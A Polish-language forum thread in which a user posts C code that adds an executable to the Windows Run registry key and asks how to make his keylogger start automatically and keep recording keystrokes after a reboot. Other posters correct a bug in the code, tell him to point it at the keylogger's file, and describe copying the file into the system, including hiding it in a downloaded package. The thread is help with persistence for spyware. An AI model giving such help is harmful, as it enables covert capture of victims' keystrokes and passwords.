Keylogger autostart

sm950 · Styczeń 17, 2013

WITAM

ZNALAZŁEM TAKI KOD:

Kod:

void addRegValue( void ) 
{
 
    HKEY reg;
    LONG result;
 
    result = RegOpenKeyEx( HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", NULL, KEY_ALL_ACCESS, &reg );
    if( result = ERROR_SUCCESS ) puts( "pobieranie uchwytu rejestru [!]\r\n" );
 
    result = RegSetValueEx(reg, "C:\Windows\system32\minehelp.exe",  0, REG_SZ,( LPBYTE ) buf, lstrlen( buf ) + 1 );
    if( result = ERROR_SUCCESS ) puts( "C:\Windows\system32\minehelp.exe" );
}

I MAM PYTANIE BO CHODZI MI GŁÓWNIE DO KEYLOGGERA BO KEYLOGGERA JUŻ MAM ALE CZY JAK TEN KOD TU BYM WCISNĄŁ JAKOŚ DO MOJEGO KEYLOGGERA TO CZY PRZY PONOWNYM URUCHOMIENIU KOMPUTERA KEYLOGGER NADAL BY ZAPISYWAŁ WCIŚNIĘTE KLAWISZE DO PLIKU TEKSTOWEGO BO CZYTAŁEM ŻE NIE ZAWSZE TAK MUSI BYĆ ALE TO NIE WIEM I WŁAŚNIE CHCIAŁBYM SIĘ DOWIEDZIEĆ JAK TO Z TYM JEST.

Darxis · Styczeń 17, 2013

Kod sam w sobie ma parę błędów chociażby wiersze zawierające "if( result = ERROR_SUCCESS )". Tutaj przypisujemy wartość ERROR_SUCCESS do zmiennej result a chodzi o to żeby sprawdzić czy RegOpenKeyEx i RegSetValueEx się powiodły czyli powinno być "if( result == ERROR_SUCCESS )".
Aby działało z twoim keyloggerem powinieneś zmienić ścieżkę "C:\Windows\system32\minehelp.exe" na tą gdzie jest plik .exe z keyloggerem.
Dodatkowo osoba uruchamiająca program musi mieć dostęp do rejestru.

sm950 · Styczeń 17, 2013

Dzięki. Bo mi ogólnie chodzi tak żeby keylogger jak by się na niego klikneło 2 razy pojawiał się w procesach i dopóki się go nie wyłączy będzie wszystko zapisywał do pliku tekstowego. Tylko nie wiem czy ten kod za to odpowiada raczej nie.

D.F. · Styczeń 18, 2013

To jest kod dodający się do rejestru, a gdzie kod kopiujący plik do systemu?

sm950 · Styczeń 19, 2013

D.F. pierwsze słyszę o kodzie kopiującym plik do systemu. Objaśnij mi co on ma za zadanie nigdy wcześniej nie spotkałem się z tym.

Tadeusz Fantom · Styczeń 19, 2013

sm950 napisał:
D.F. pierwsze słyszę o kodzie kopiującym plik do systemu. Objaśnij mi co on ma za zadanie nigdy wcześniej nie spotkałem się z tym.

Ma za zadanie spowodować skopiowanie pliku i umieszczenie kopii tego pliku w systemie, przeważnie w odpowiednim miejscu systemu.
Plik może znaleźć się jako:
-pobrany przez użytkownika systemu z różnych źródeł
-zamaskowany w pobranym pakiecie
-przesłany z serwera za pomocą połączenia sieciowego
Chyba prościej już nie można wyjaśnić?

szkitoniarz · Styczeń 19, 2013

https://www.google.pl/url?sa=t&rct=...=oAM-KJuBEy5qyiDbfGnN3Q&bvm=bv.41248874,d.d2k
To powinno pomóc

Pzdr.

sm950 · Styczeń 19, 2013

dobra dzięki. A teraz mam jeszcze takie pytanie czy jak bym wstawił kod swojego keyloggera napisali byście może czy da się go jakoś uprościć ?

sm950 · Styczeń 20, 2013

temat do zamknięcia

Keylogger autostart

sm950

Użytkownik

Darxis

Użytkownik

sm950

Użytkownik

D.F.

Były Moderator

sm950

Użytkownik

Tadeusz Fantom

Użytkownik

szkitoniarz

Użytkownik

sm950

Użytkownik

sm950

Użytkownik